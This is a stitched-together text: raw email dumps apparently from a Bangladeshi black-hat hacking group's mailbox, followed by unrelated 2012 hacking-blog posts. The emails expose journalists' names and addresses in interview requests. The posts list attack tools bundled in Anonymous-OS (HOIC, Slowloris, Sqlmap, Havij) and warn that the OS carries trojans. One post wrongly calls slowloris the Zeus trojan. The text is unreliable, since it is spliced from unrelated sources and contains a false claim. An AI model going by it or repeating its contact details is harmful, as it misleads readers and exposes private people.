own on you people now?</div><div><br></div><div>Thanks a lot.</div><div>
 
 
 
<br></div><div><br></div><div>--------------------</div><div>Syed Tashfin C=
howdhury</div><div>Editor, Xtra</div><div>New Age</div>
</div><br>
</blockquote></div><br>
</div></div></blockquote></div><br></div>
 
--f46d0442726cd6cdff04baa76b6f--
                                                                                                                                                                                                                                                               
MIME-Version: 1.0
Received: by 10.68.62.74 with HTTP; Fri, 17 Feb 2012 12:46:33 -0800 (PST)
In-Reply-To: <CAMfj3d238veuSh869qgA3JZQCdvX72ThnHYhX3QEupafpqTfbQ@mail.gmail.com>
References: <CAMfj3d238veuSh869qgA3JZQCdvX72ThnHYhX3QEupafpqTfbQ@mail.gmail.com>
Date: Sat, 18 Feb 2012 02:46:33 +0600
Delivered-To: bangladeshblackhathacker@gmail.com
Message-ID: <CACRs5pGxZy997s01MDZGAyszaQoX_Uqj-sKdfnLTiU0+VP3zig@mail.gmail.com>
Subject: Re: about a secret interview
From: bangladeshblack hathacker <bangladeshblackhathacker@gmail.com>
To: Wasik Ovee <wasikovee@gmail.com>
Content-Type: multipart/alternative; boundary=047d7b10cac13a5baf04b92f0a39
 
--047d7b10cac13a5baf04b92f0a39
Content-Type: text/plain; charset=ISO-8859-1
 
Bro, It's not possible to give any voice interview. You can send us
question. We will answer....
 
On Fri, Feb 17, 2012 at 9:13 PM, Wasik Ovee <wasikovee@gmail.com> wrote:
 
> hello,
> *i found this mail ID from Jobayer Alam Rony*. he told me contact with
> you.
>
> i am talking from e Raising Star, Bangladeshi News paper. we wanted to
> take an interview about current hacking and other affair. we are ensuring
> that we will keep your identity secret and this interview will be positive
> for your team and for bangladesh.
>
> let me know if you like to take an interview with us. u can talk from
> gtalk or skype if u want. or u can come to our offie (raising star)... as u
> think best.
>
> reply as soon as possible
>
> --
> *Wasik Ovee*
> *CEO*
> *Design Phenomena* <http://www.facebook.com/designphenomena>
>
>
 
--047d7b10cac13a5baf04b92f0a39
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
 
Bro, It&#39;s not possible to give any voice interview. You can send us que=
stion. We will answer.... <br><br><div class=3D"gmail_quote">On Fri, Feb 17=
, 2012 at 9:13 PM, Wasik Ovee <span dir=3D"ltr">&lt;<a href=3D"mailto:wasik=
ovee@gmail.com">wasikovee@gmail.com</a>&gt;</span> wrote:<br>
<blockquote class=3D"gmail_quote" style=3D"margin:0 0 0 .8ex;border-left:1p=
x #ccc solid;padding-left:1ex">hello,<br><b>i found this mail ID from Jobay=
er Alam Rony</b>. he told me contact with you.<br><br>i am talking from e R=
aising Star, Bangladeshi News paper. we wanted to take an interview about c=
urrent hacking and other affair. we are ensuring that we will keep your ide=
ntity secret and this interview will be positive for your team and for bang=
ladesh.<br>
 
<br>let me know if you like to take an interview with us. u can talk from g=
talk or skype if u want. or u can come to our offie (raising star)... as u =
think best.<br><br>reply as soon as possible<span class=3D"HOEnZb"><font co=
lor=3D"#888888"><br clear=3D"all">
<br>-- <br>
<font style=3D"font-family:courier new,monospace" size=3D"2"><b>Wasik Ovee<=
/b></font><br><i style=3D"font-family:courier new,monospace">CEO</i><br><a =
href=3D"http://www.facebook.com/designphenomena" target=3D"_blank"><font st=
yle=3D"font-family:courier new,monospace" size=3D"2"><b><span style=3D"colo=
r:rgb(153,0,0)">Design</span> <span style=3D"color:rgb(255,102,0)">Phenomen=
a</span></b></font></a><br>
 
<br>
</font></span></blockquote></div><br>
 
--047d7b10cac13a5baf04b92f0a39--
                                                                                                                                                                                                                                                               
MIME-Version: 1.0
Received: by 10.68.56.9 with HTTP; Sun, 12 Feb 2012 10:47:04 -0800 (PST)
In-Reply-To: <4f380760.6560b40a.0e96.5444@mx.google.com>
References: <4f380760.6560b40a.0e96.5444@mx.google.com>
Date: Mon, 13 Feb 2012 00:47:04 +0600
Delivered-To: bangladeshblackhathacker@gmail.com
Message-ID: <CACRs5pEeebfqsgdqkthT-GhX09YxiaQJj5NU3uGjZnvnz_Y62w@mail.gmail.com>
Subject: Re: Ur articke
From: bangladeshblack hathacker <bangladeshblackhathacker@gmail.com>
To: ahsan.akraza@gmail.com
Content-Type: multipart/alternative; boundary=14dae9c0985ebc24cc04b8c8c909
 
--14dae9c0985ebc24cc04b8c8c909
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: base64
 
4KaG4Ka54Ka44Ka+4KaoIOCmreCmvuCmhywg4KaG4Kaq4Kao4Ka+4Kam4KeH4KawIOCmleCni+Cm
qCDgpqTgpqXgp43gpq8g4Kay4Ka+4KaX4Kay4KeHIOCmhuCmruCmvuCmpuCnh+CmsCDgpqzgprLg
pqTgp4cg4Kaq4Ka+4Kaw4KeH4Kao4KWkIOCmhuCmruCmsOCmviDgpobgpqrgpqjgpr7gpqbgp4fg
prAg4KaW4KeB4KasIOCmleCmvuCmm+Cnh+CmsArgpq7gpr7gpqjgp4HgprfgpofgpaQgOi0pCgpP
biBNb24sIEZlYiAxMywgMjAxMiBhdCAxMjozOSBBTSwgYWhzYW4uYWtyYXphQGdtYWlsLmNvbSA8
CmFoc2FuLmFrcmF6YUBnbWFpbC5jb20+IHdyb3RlOgoKPiBQbHMgc2VlIHVyIGFydGljbGUgdXBs
b2FkZWQgb24gYmFuZ2xhbmV3czI0LmNvbQo+Cj4gU3RheSBmaW5lCj4KPiBBaHNhbiBrYWJpcgo+
IE91dHB1dCBlZGl0b3IKPgo+Cj4K
--14dae9c0985ebc24cc04b8c8c909
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: base64
 
4KaG4Ka54Ka44Ka+4KaoIOCmreCmvuCmhywg4KaG4Kaq4Kao4Ka+4Kam4KeH4KawIOCmleCni+Cm
qCDgpqTgpqXgp43gpq8g4Kay4Ka+4KaX4Kay4KeHIOCmhuCmruCmvuCmpuCnh+CmsCDgpqzgprLg
pqTgp4cg4Kaq4Ka+4Kaw4KeH4Kao4KWkIOCmhuCmruCmsOCmviDgpobgpqrgpqjgpr7gpqbgp4fg
prAg4KaW4KeB4KasIOCmleCmvuCmm+Cnh+CmsCDgpq7gpr7gpqjgp4HgprfgpofgpaQgOi0pPGJy
Pjxicj48ZGl2IGNsYXNzPSJnbWFpbF9xdW90ZSI+T24gTW9uLCBGZWIgMTMsIDIwMTIgYXQgMTI6
MzkgQU0sIDxhIGhyZWY9Im1haWx0bzphaHNhbi5ha3JhemFAZ21haWwuY29tIj5haHNhbi5ha3Jh
emFAZ21haWwuY29tPC9hPiA8c3BhbiBkaXI9Imx0ciI+Jmx0OzxhIGhyZWY9Im1haWx0bzphaHNh
bi5ha3JhemFAZ21haWwuY29tIj5haHNhbi5ha3JhemFAZ21haWwuY29tPC9hPiZndDs8L3NwYW4+
IHdyb3RlOjxicj4KPGJsb2NrcXVvdGUgY2xhc3M9ImdtYWlsX3F1b3RlIiBzdHlsZT0ibWFyZ2lu
OjAgMCAwIC44ZXg7Ym9yZGVyLWxlZnQ6MXB4ICNjY2Mgc29saWQ7cGFkZGluZy1sZWZ0OjFleCI+
UGxzIHNlZSB1ciBhcnRpY2xlIHVwbG9hZGVkIG9uIDxhIGhyZWY9Imh0dHA6Ly9iYW5nbGFuZXdz
MjQuY29tIiB0YXJnZXQ9Il9ibGFuayI+YmFuZ2xhbmV3czI0LmNvbTwvYT48YnI+Cjxicj4KU3Rh
eSBmaW5lPGJyPgo8YnI+CkFoc2FuIGthYmlyPGJyPgpPdXRwdXQgZWRpdG9yPGJyPgo8YnI+Cjxi
cj4KPC9ibG9ja3F1b3RlPjwvZGl2Pjxicj4K
--14dae9c0985ebc24cc04b8c8c909--

Google code University

hi guys i brought a very good google programme from which you can learn many things not noly related to hacking but also many other things have a look at Google Code University GCU
have fun 

Wednesday, March 14, 2012

Alert anonymous-os has trojans :said by anon0ps

Yes you heard it right after shocking reveal that antisec was under FBI supervision today a tweet by official anon0ps says that it is wrapped up with trojans here is link
http://twitter.com/statuses/180092538395443201/
hope you have still not used it
as i said play safe so do a check on virustotal even if it is a linux. It may be a botnet or something like slowloris(zeus trojan) or some tracking trojans or even dangerous than that. DONT USE IT

Tuesday, March 13, 2012

It security resources V3 is out!!!

IT security resources V3 is out lots of new things added specially SCADAs 
happy hacking 
https://sourceforge.net/projects/itsecures/
it has videos,methodologies,tools,etc

Monday, March 12, 2012

#anonymous releases anonymous-os for security testing UPDATE

Anonymous has
developed a linux based on ubuntu with a mate UI
for security testing
Here some of preinstalled apps on Anonymous-OS:
- ParolaPass Password Generator
- Find Host IP
- Anonymous HOIC
- Ddosim
- Pyloris
- Slowloris
- Tors Hammer
- Sqlmap
- Havij
- Sql Poison
- Admin Finder
- John the Ripper
- Hash Identifier
- Tor
- XChat IRC
- Pidgin
- Vidalia
- Polipo
- JonDo
- i2p
- Wireshark
- Zenmap
…and more
Including Broadcom BCM43xx wireless driver
check it out here
http://anonymous-os.tumblr.com/
but guys be careful it may contain backdoors,payloads, trojan to track you . play safe read more here http://technomaina.blogspot.com/2012/03/alert-anonymous-os-has-trojans-said-by.html

Saturday, March 3, 2012

Best penetration testing browsers

i have found some of the best and powerfull penetration testing browsers in this cyber world you must try them for once
  1. Hcon: a great browser developed by a cyber security trainer and analyst must try available in 2 types 1) Aqua based(chrome) 2) fire based (Firefox) you can get it here
  2. Owasp MANTRA its also great one but with little less addons and its bit of small one get it here
hope you like theses browsers HCON is great for me

Twitter Delicious Facebook Digg Stumbleupon Favorites More